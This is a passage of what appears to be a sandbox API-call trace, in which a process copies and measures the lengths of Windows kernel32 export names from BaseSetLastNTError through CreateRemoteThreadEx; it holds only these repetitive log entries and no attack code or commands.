[0178.384] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.384] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.384] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.385] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.385] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.385] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.385] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.385] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.385] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.385] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.385] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.385] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.385] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.385] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.385] lstrlenA (lpString="BEEP") returned 4 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.385] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.385] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.385] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.385] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.385] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.385] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.385] lstrcpyA (in: lpString1=0x2398df8, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.386] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.386] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.386] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.386] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.386] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.386] lstrlenA (lpString="CANCELIO") returned 8 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.386] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.386] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.386] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.386] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.386] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.386] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.386] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.386] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.386] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.386] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.386] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.386] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.386] lstrcpyA (in: lpString1=0x2398df8, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.386] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.387] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.387] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.387] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.387] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.387] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.387] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.387] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.387] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.387] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.387] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.387] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.387] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.387] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.387] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.387] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.387] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.387] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.387] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.387] lstrcpyA (in: lpString1=0x2398df8, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.387] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.388] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.388] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.388] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.388] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.388] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.388] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.388] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.388] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.388] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.388] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.388] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.388] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.388] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.388] lstrlenA (lpString="COPYFILEA") returned 9 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.388] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.388] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.388] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.388] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.388] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.389] lstrlenA (lpString="COPYFILEW") returned 9 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.389] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.389] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.389] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.389] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.389] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.389] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.389] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.389] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.389] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.389] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.389] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.389] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.389] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.389] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.389] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.389] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.389] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.389] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.390] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.390] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.390] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.390] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.390] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.390] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.390] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.390] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.390] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.390] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.390] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.390] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.390] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.390] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.390] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.390] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.390] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.390] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.390] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.391] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.391] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.391] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.391] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.391] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.391] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.391] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.391] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.391] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.391] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.391] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.391] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.391] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.391] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.391] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.391] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.391] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.391] lstrcpyA (in: lpString1=0x2398df8, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.391] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 